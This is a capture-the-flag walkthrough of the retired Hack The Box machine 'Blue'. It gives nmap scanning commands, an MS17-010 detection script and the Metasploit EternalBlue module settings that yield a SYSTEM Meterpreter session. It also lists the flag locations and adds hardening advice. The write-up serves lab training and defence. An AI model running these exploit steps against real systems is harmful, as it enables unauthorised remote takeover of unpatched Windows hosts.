HTB: Blue — EternalBlue (MS17-010)

Full walkthrough. Enumeration → surface identification → exploitation → reinforcement notes.

▶ Video coming soon — add YouTube ID to script below

Overview

Blue is a retired Windows machine on Hack The Box running an unpatched SMBv1 service vulnerable to MS17-010 (EternalBlue). The attack chain is: enumerate open ports → detect SMB vuln → exploit via Metasploit → retrieve both flags as SYSTEM.

This is a pure lab exercise on an authorized retired HTB machine. No real-world systems were involved.

Enumeration

Full port scan with version and default script detection:

nmap -sV -sC -p- --open -T4 10.10.10.40

Notable services: 135/tcp MSRPC, 139/tcp NetBIOS, 445/tcp SMB.

OS fingerprint: Windows 7 / Windows Server 2008 R2. SMB signing disabled.

Vulnerability Detection

nmap -p 445 --script smb-vuln-ms17-010 10.10.10.40

Result: VULNERABLE — Remote Code Execution via MS17-010 (EternalBlue). CVSSv3: 9.8 Critical.

Exploitation

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.10.10.40
set LHOST <tun0 ip>
run

A Meterpreter session opens as NT AUTHORITY\SYSTEM — no privilege escalation step needed.

Post-Exploitation

User flag: C:\Users\haris\Desktop\user.txt
Root flag: C:\Users\Administrator\Desktop\root.txt

Reinforcement Notes

Disable SMBv1. No modern workload requires it.
Apply MS17-010 patch. KB4012212 (Win7) / KB4012215 (Server 2008 R2).
Restrict SMB at perimeter. Block 445 inbound at firewall/VLAN boundary.
EDR + SIEM. Alert on SMB exploit signatures (e.g. MS17-010 IDS rules).
Network segmentation. Limit lateral movement blast radius.

↓ Downloads

sh htb-blue-enum.sh

Nmap + SMB enumeration script sequence used in this walkthrough.

Download Script

md htb-blue-walkthrough.md

Step-by-step written walkthrough — scope, method, findings, and reinforcement.

Download Walkthrough